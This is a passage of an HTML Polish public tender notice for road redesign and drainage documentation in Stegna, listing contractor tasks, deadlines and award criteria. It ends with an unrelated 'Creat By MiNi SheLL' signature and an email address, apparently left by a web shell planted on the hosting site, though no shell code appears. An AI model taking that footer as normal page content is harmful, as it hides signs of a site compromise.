projektowych dla terenu przewidzianego zamierzeniem inwestycyjnym;2/ Wykonać pomiary sytuacyjno-wysokościowe oraz inwentaryzację pasa drogowego;3/ Opracować projekt budowlano - wykonawczy na wykonanie chodnika i zjazdów w tym uwzględnić dostosowanie chodnika do istniejącej infrastruktury pod względem wysokościowym;4/ Opracować projekt branży sanitarnej na odwodnienie;5/ Opracować kosztorys inwestorski;6/ Opracować przedmiar robót oraz kosztorysy ofertowy;7/ Uzyskać warunki techniczne od zarządcy drogi (Zarząd Dróg Wojewódzkich w Gdańsku) oraz od gestorów urządzeń liniowych występujących w drodze: - Energa - Operator SA, - Telekomunikacja Polska SA, - Centralny Wodociąg Żuławski, - Przedsiębiorstwo Komunalne ,,Mierzeja" (jeżeli są wymagane).8/ Rozpatrzyć możliwość wprowadzenia rozwiązań zwiększających bezpieczeństwo zjazdu z drogi na wysokości restauracji Keja (sugestia Departamentu Infrastruktury Urzędu Marszałkowskiego w Gdańsku).9/ Opracować wymagane projekt zgodnie z zapisami Miejscowego Planu Zagospodarowania Przestrzennego dla tego terenu; 10/ Opracować szczegółowe specyfikacje techniczne dla wykonania i odbioru robót;11/ Uzyskać na rzecz Inwestora wszelkie decyzje, opinie i uzgodnienia wymagane na podstawie odrębnych przepisów;12/ Opracować wniosek oraz uzyskać na rzecz Inwestora pozwolenie na budowę (jeżeli jest wymagane);13/ Opracować projekt stałej organizacji ruchu (jeżeli jest wymagane); 14/ Dostarczyć do siedziby Zamawiającego przedmiot zamówienia;15/ Pełnić nadzór autorski.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>74232000-4, 74232200-6, 74224000-5<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2018-04-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Okres rękojmi</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>4</td><td><b>Nazwa: </b></td><td>Opracowanie dokumentacji projektowo - kosztorysowych na: ,,Przebudowa drogi gminnej ul. Ogrodowej w Stegnie wraz z wykonaniem odwodnienia drogi i usunięciem kolizji od skrzyżowania z drogą DW 502 ul. Elbląską do skrzyżowania z droga gminną ul. Rycerską". </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>,,Przebudowa drogi gminnej ul. Ogrodowej w Stegnie wraz z wykonaniem odwodnienia drogi i usunięciem kolizji od skrzyżowania z drogą DW 502 ul. Elbląską do skrzyżowania z droga gminną ul. Rycerską".1. Zamiar inwestycyjny obejmuje projektowanie w zakresie:1/ Wykonania ciągu pieszo-jezdnego, długości ok. 270mb. o nawierzchni z kostki betonowej;2/ Wykonania zjazdów indywidualnych na posesje z kostki betonowej oraz wyokrąglonego zjazdu na skrzyżowaniu z drogą wewnętrzną;3/ Przebudowy skrzyżowania z drogą wojewódzką nr 502 (ul. Elbląską);4/ Wykonanie odprowadzania wód opadowych z jezdni drogi;5/ Ustalenie stałej organizacji ruchu drogowego; 6/ Usunięcie potencjalnych kolizji urządzeń liniowych wynikających z uzyskanych warunków technicznych.2. Planowany przebieg inwestycji obejmuje działki: dz. nr 764/4, 748, 766/1, 766/4 (Gmina Stegna), 765/2 (Powiat Nowodworski). Ponadto przebieg inwestycji będzie obejmować inne nowopowstałe działki w wyniku podziałów geodezyjnych np. podział i zmiana użytkowania dz. nr 766/4. 3. Stan faktyczny Projektowany przebieg drogi odcinka ul. Ogrodowej obejmuje grunty użytkowane jako drogi (dr) oraz grunt stanowiący użytek (RIV a) stanowiące własność Gminy Stegna. Droga nie posiada trwałego utwardzenia oraz odwodnienia. Na całej długości występuje nawierzchnia gruntowa miejscami wzmocniona kruszywami kamiennymi. Droga na całym odcinku nie posiada oświetlenia ulicznego. W drodze znajdują się urządzenia liniowe nie związane z potrzebami drogowymi4. W ramach przedmiotu zamówienia Wykonawca przedmiotu zamówienia powinien:1/ Dokonać wydzielenia terenu na potrzeby drogowe i zmienić rodzaj użytkowania na dr;2/ Opracować mapę do celów projektowych dla terenu przewidzianego zamierzeniem inwestycyjnym;3/ Wykonać pomiary sytuacyjno-wysokościowe oraz inwentaryzację pasa drogowego;4/ Wykonać odwierty geotechniczne według potrzeb i przygotować opinię geotechniczną; 5/ Uzyskać warunki techniczne do gestorów urządzeń liniowych występujących w drodze: - Energa - Operator SA, - Telekomunikacja Polska SA, - Centralny Wodociąg Żuławski, - Przedsiębiorstwo Komunalne ,,Mierzeja". 6/ Opracować operat wodno prawny dla kanalizacji deszczowej i uzyskać pozwolenie wodno prawne (jeżeli jest wymagane);7/ Uzyskać decyzję o środowiskowych uwarunkowaniach zgody na realizacje inwestycji (jeżeli jest wymagana);8/ Uzyskać decyzję o ustaleniu lokalizacji inwestycji celu publicznego dla zadania i opracować wymagane projekty zgodnie z ustaloną lokalizacją;9/ Opracować projekty budowlane i wykonawcze branży drogowej, odprowadzania wód oraz innych związanych z potencjalnymi kolizjami z urządzeniami obcymi mogącymi wystąpić w pasie drogowym;10/ Opracować informacje dot. bezpieczeństwa i ochrony zdrowia (BIOZ). 11/ Opracować szczegółowe specyfikacje techniczne dla wykonania i odbioru robót drogowych (dla każdej branży);12/ Opracować kosztorysy inwestorskie dla poszczególnych branż;13/ Opracować przedmiary robót oraz kosztorysy ofertowe dla każdej branży;14/ Uzyskać na rzecz Inwestora wszelkie decyzje, opinie i uzgodnienia wymagane na podstawie odrębnych przepisów;15 Opracować wniosek oraz uzyskać na rzecz Inwestora pozwolenie na budowę;16/ Dostarczyć do siedziby Zamawiającego kompletną dokumentację;17/ Opracować projekt stałej organizacji ruchu; 18/ Pełnić nadzór autorski.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>74232000-4, 74232200-6, 74224000-5<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2018-05-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Okres rękojmi</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>5</td><td><b>Nazwa: </b></td><td>Opracowanie dokumentacji projektowo - kosztorysowych na: ,,Przebudowa drogi ul. Nowej oraz ul. Wrzosowej w Stegnie wraz z wykonaniem odwodnienia i usunięciem kolizji"</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>,,Przebudowa drogi ul. Nowej oraz ul. Wrzosowej w Stegnie wraz z wykonaniem odwodnienia i usunięciem kolizji"Zamiar inwestycyjny obejmuje projektowanie w zakresie: 1/ Wykonania ciągu pieszo-jezdnego ok. 245mb. o nawierzchni z kostki betonowej w ul. Nowej; 2/ Wykonania ciągu pieszo-jezdnego ok. 114mb. o nawierzchni z kostki betonowej w ul. Wrzosowej; 3/ Wykonania zjazdów indywidualnych na posesje z kostki betonowej oraz wyokrąglonych zjazdów/skrzyżowań ul. Nowej z ul. Wrzosową, ul. Nowej z ul. Grunwaldzką oraz ul. Wrzosowej z ul. Grunwaldzką w Stegnie; 4/ Wykonania odprowadzenia wód opadowych z jezdni obu dróg. 5/ Ustalenia stałej organizacji ruchu drogowego. 6/ Usunięcie potencjalnych kolizji urządzeń liniowych wynikających z uzyskanych warunków technicznych. Planowany przebieg inwestycji obejmuje działki w obrębie ewidencyjnym Stegna nr: 49/1, 49/2, 50, 45, 46 oraz 114/1, 114/2 2. Stan faktyczny 1/ Projektowany przebieg drogi ul. Nowej obejmuje grunty użytkowane jako drogi (dr) stanowiące własność Gminy Stegna od zjazdu z drogi gminnej ul. Jagiełły do skrzyżowania z drogą gminną ul. Grunwaldzką. Droga nie posiada trwałego utwardzenia. Na całej długości występuje nawierzchnia gruntowa miejscami wzmocniona kruszywami kamiennymi. Zjazd z ul. Jagieły z kostki betonowej wyokrąglony łukiem z wyniesionym krawężnikiem. Szerokość jezdni na zakończeniu łuku pomiędzy krawężnikami 3,5 m. 2/ Projektowany przebieg drogi ul. Wrzosowej obejmuje grunty użytkowane jako drogi (dr) stanowiące własność Gminy Stegna od zjazdu z drogi gminnej ul. Grunwaldzkiej do skrzyżowania z ul. Nową. Drogi ul. Nowa oraz ul. Wrzosowa nie posiadają trwałego utwardzenia oraz odwodnienia. Na całej długości występuje nawierzchnia gruntowa miejscami wzmocniona kruszywami kamiennymi. Oświetlenie drogowe na słupach energetycznych. Linia kablowa napowietrzna. Szerokość pasa drogowego w granicach 5,5-6,5m. 3. W ramach przedmiotu zamówienia Wykonawca przedmiotu zamówienia powinien: W I etapie: 1/ Opracować mapę do celów projektowych dla terenu przewidzianego zamierzeniem inwestycyjnym; 2/ Wykonać pomiary sytuacyjno-wysokościowe oraz inwentaryzację pasa drogowego; 3/ Wykonać niezbędne odwierty geotechniczne; 4/ Uzyskać warunki techniczne do gestorów urządzeń liniowych występujących w drodze: Energa-Operator SA, Telekomunikacja Polska SA, Centralny Wodociąg Żuławski, Przedsiębiorstwo Komunalne ,,Mierzeja"; 5/ Opracować plan zagospodarowania terenu i na jego podstawie uzyskać od Inwestora uzgodnienia przebiegu układu drogowego i odwodnienia dróg; 6/ Uzgodnić z Inwestorem stałą organizację ruchu; 7/ Uzyskać decyzję o środowiskowych uwarunkowaniach zgody na realizację inwestycji (w przypadku jeżeli jest wymagana); 8/ Opracować operat wodnoprawny dla odprowadzenia wód opadowych z jezdni i uzyskać pozwolenie wodnoprawne; W II etapie: 1/ Uzyskać decyzję o ustaleniu lokalizacji inwestycji celu publicznego dla zadania i opracować wymagane projekty zgodnie z ustalona lokalizacją; 2/ Opracować projekty budowlane i wykonawcze branży drogowej, deszczowej oraz innych związanych z potencjalnymi kolizjami z urządzeniami obcymi mogącymi wystąpić w pasie drogowym; 3/ Opracować informacje dot. bezpieczeństwa i ochrony zdrowia (BIOZ). 4/ Opracować branżowe szczegółowe specyfikacje techniczne dla każdej branży; 5/ Opracować kosztorysy inwestorskie dla poszczególnych branż; 6/ Opracować przedmiary robót oraz kosztorysy ofertowe dla każdej branży; 7/ Uzyskać na rzecz Inwestora wszelkie decyzje, opinie i uzgodnienia wymagane na podstawie odrębnych przepisów; 8/ Opracować wniosek oraz uzyskać na rzecz Inwestora pozwolenie na budowę; 9/ Opracować projekt stałej organizacji ruchu; 10/ Dostarczyć do siedziby Zamawiającego przedmiot zamówienia; 11/ Pełnić nadzór autorski. <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>74232000-4, 74232200-6, 74224000-5<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2018-05-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Okres rękojmi</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com